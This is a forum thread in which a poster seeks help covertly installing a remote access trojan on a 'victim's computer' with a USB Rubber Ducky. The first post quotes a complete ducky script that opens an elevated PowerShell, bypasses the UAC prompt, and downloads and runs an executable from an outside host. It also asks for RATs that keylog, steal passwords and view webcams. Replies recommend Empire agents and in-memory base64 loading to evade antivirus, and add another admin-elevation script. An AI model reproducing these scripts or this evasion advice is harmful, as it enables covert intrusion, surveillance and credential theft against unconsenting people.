Mike Jamieson Posted March 15, 2017 Posted March 15, 2017 Hey Guys, I was wondering if anyone has used the usb rubber ducky to execute a RAT on a victim's computer. I found the script, Payload Windows 10 : Download and execute file with Powershell, on the ducky github and thought it would be a great means to injecting a RAT on victim's computer. Does anyone have experience with this or could share some RAT's that they've used in the past? In particular, RAT's that are able to view webcam, keylog, obtain passwords, transfer files and provide control over the infected machine, etc. Here is the ducky script to Payload Windows 10 : Download and execute file with Powershell: REM Windows 10: Poweshell administrator download and execute file REM Author: Judge2020 REM author website: Judge2020.com REM REM start of script REM REM let the HID enumerate DELAY 1000 GUI r DELAY 200 REM my best attempt at a elevated powershell instance STRING powershell Start-Process powershell -Verb runAs ENTER DELAY 1000 ALT y DELAY 200 STRING $down = New-Object System.Net.WebClient; $url = 'http://www.greyhathacker.net/tools/messbox.exe'; $file = 'mess1.exe'; $down.DownloadFile($url,$file); $exec = New-Object -com shell.application; $exec.shellexecute($file); exit; I found this repository of various RAT's on github and again was wondering if anyone has any experience with any of them? https://github.com/malwares/Remote-Access-Trojan 1 Quote
CztHrm Posted May 4, 2017 Posted May 4, 2017 There is a guy on HF who created a RAT specifically for the rubber ducky. I'd check him out if that's what you're into. You can screen view, edit stuff etc.I hear it's rather difficult to deploy though. 1 Quote
PoSHMagiC0de Posted May 9, 2017 Posted May 9, 2017 I tend to launch agents for pentest frameworks as my RATs for ducky and Bash Bunny stuff. Empire is one of choice I use a lot for Windows environments. I tend to stay away from dropping binaries to the drive. Even if I have to download a pre-stage agent I have to build to handle getting the binary as base64 to decode and execute/inject, I try not to put it on the victim's drive to avoid AV. Quote
ksk Posted May 21 Posted May 21 i did this to open PowerShell in admin mode REM Open Command Prompt GUI r DELAY 100 STRING cmd DELAY 100 ENTER DELAY 2000 REM open powershell as admin STRING powershell -Command "Start-Process PowerShell -Verb RunAs" ENTER Quote
ksk Posted May 21 Posted May 21 On 5/4/2017 at 5:40 PM, CztHrm said: There is a guy on HF who created a RAT specifically for the rubber ducky. I'd check him out if that's what you're into. You can screen view, edit stuff etc.I hear it's rather difficult to deploy though. where is this? Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.